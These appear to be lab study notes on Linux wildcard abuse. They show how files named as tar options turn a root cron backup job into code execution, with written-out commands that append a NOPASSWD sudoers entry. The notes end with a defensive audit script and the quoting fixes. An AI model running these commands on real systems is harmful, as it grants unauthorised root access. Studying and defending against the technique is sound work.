# Intro
- Wildcard chars can be used as a replacement for other chars and are interpreted by the shell before other actions
- Below are some examples of wildcard chars:

|**Character**|**Significance**|
|---|---|
|`*`|An asterisk that can match any number of characters in a file name.|
|`?`|Matches a single character.|
|`[ ]`|Brackets enclose characters and can match any single one at the defined position.|
|`~`|A tilde at the beginning expands to the name of the user home directory or can have another username appended to refer to that user's home directory.|
|`-`|A hyphen within brackets will denote a range of characters.|

# Example Wildcard Abuse
- If we look at the `man` page for the `tar` command, we see that the `--checkpoint-action` option permits an `EXEC` action to be executed when a checkpoint is reached, i.e., run an arbitrary OS command once the `tar` command executes

![[images/Pasted image 20260203152130.png]]

- By creating files with the names below, when the wildcard is specified, the shell expands it to the file names and they are passed to `tar` as command-line options:
    - `--checkpoint=1`
    - `--checkpoint-action=exec=sh root.sh`

```bash
echo 'echo "htb-student ALL=(root) NOPASSWD: ALL" >> /etc/sudoers' > root.sh
echo "" > "--checkpoint-action=exec=sh root.sh"
echo "" > --checkpoint=1
ls -la
total 56
drwxrwxrwt 10 root root 4096 Aug 31 23:12 .
drwxr-xr-x 24 root root 4096 Aug 31 02:24 ..
-rw-r--r-- 1 root root 378 Aug 31 23:12 backup.tar.gz
-rw-rw-r-- 1 htb-student htb-student 1 Aug 31 23:11 --checkpoint=1
-rw-rw-r-- 1 htb-student htb-student 1 Aug 31 23:11 --checkpoint-action=exec=sh root.sh
drwxrwxrwt 2 root root 4096 Aug 31 22:36 .font-unix
drwxrwxrwt 2 root root 4096 Aug 31 22:36 .ICE-unix
-rw-rw-r-- 1 htb-student htb-student 60 Aug 31 23:11 root.sh
```

- Let's tie it all together with a `cron job`, which is set up to back up the `/home/htb-student` directory's contents and create a compressed archive within `/home/htb-student`
- Importantly, this `cron` job is set to run every minute, so it is a good candidate for privesc

```text
#
# mh dom mon dow command
*/01 * * * * cd /home/htb-student && tar -zcf /home/htb-student/backup.tar.gz *
```

- Once the `cron` job runs, we can check to see if `htb-student` has `sudo` privs

```bash
sudo -l
Matching Defaults entries for htb-student on NIX02:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User htb-student may run the following commands on NIX02:
    (root) NOPASSWD: ALL
```
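
- Added example, not part of the original notes: a defensive audit in POSIX shell that lists file names an unquoted `*` would hand to a command as options, and flags crontab entries that give `tar` a bare `*`. The function names and the `/srv/data` crontab lines are constructed for illustration.

```shell
#!/bin/sh
# Added audit example (not from the original notes); helper names are hypothetical.

# Print names in directory $1 that begin with '-': an unquoted '*' expanded
# there would hand these to a command as options, not as file operands.
find_option_like_names() (
    for path in "$1"/-*; do
        # When nothing matches, the pattern stays literal and fails this test.
        [ -e "$path" ] || [ -L "$path" ] || continue
        printf '%s\n' "${path##*/}"
    done
)

# Read crontab text on stdin and print "LINE: text" for each entry that gives
# tar a bare '*' operand with no '--' before it. A './*' operand is not flagged.
flag_cron_wildcards() {
    awk '
        /^[ \t]*#/ { next }                       # skip comment lines
        {
            seen_tar = 0; guarded = 0; hit = 0
            for (i = 1; i <= NF; i++) {
                if ($i == "tar" || $i ~ /\/tar$/) { seen_tar = 1; guarded = 0; continue }
                if (!seen_tar) continue           # schedule fields come before tar
                if ($i == "--") guarded = 1       # end of options: later names are operands
                else if ($i == "*" && !guarded) hit = 1
            }
            if (hit) printf "%d: %s\n", NR, $0
        }'
}

# Constructed sample: the cron entry from the notes plus two hardened variants.
flag_cron_wildcards <<'EOF'
# mh dom mon dow command
*/01 * * * * cd /home/htb-student && tar -zcf /home/htb-student/backup.tar.gz *
*/05 * * * * cd /srv/data && tar -zcf /srv/backup.tar.gz -- *
*/10 * * * * cd /srv/data && tar -zcf /srv/backup.tar.gz ./*
EOF
find_option_like_names "${1:-.}"
```

- Writing the operand as `./*`, or placing `--` before the `*`, makes `tar` treat every expanded name as a file rather than an option.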